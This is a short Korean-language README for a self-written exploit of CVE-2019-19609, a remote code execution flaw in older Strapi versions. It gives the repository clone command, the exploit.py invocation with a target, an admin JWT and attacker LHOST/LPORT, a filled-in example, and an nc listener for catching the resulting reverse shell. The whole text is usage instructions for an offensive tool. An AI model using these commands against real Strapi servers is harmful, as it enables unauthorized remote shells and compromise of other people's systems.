
Strapi의 CVE-2019-19609에 대한 익스플로잇 (원격 코드 실행)
CVE-2019-19609 (Strapi 3.0.0-beta.17.7 이하 버전에서의 원격 코드 실행)에 대한 익스플로잇입니다.
이 취약점이 있는 상황에 직면했지만 공개된 익스플로잇이 없어 직접 만들어서 공유합니다.
git clone https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
cd CVE-2019-19609-EXPLOIT
python exploit.py -d DOMAIN_OR_IP -jwt JSON_WEB_TOKEN -l LHOST -p LPORT
python exploit.py -d example.com -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMjU3NDc3LCJleHAiOjE2MzI4NDk0Nzd9.JIKHRz_EDXg1fhThRhIbIyZ9w-6mE01dhnno2AtMMU0 -l 10.10.14.86 -p 1221
다른 터미널에서 익스플로잇에 전달한 포트로 리스닝을 시작합니다.
nc -vnlp 1221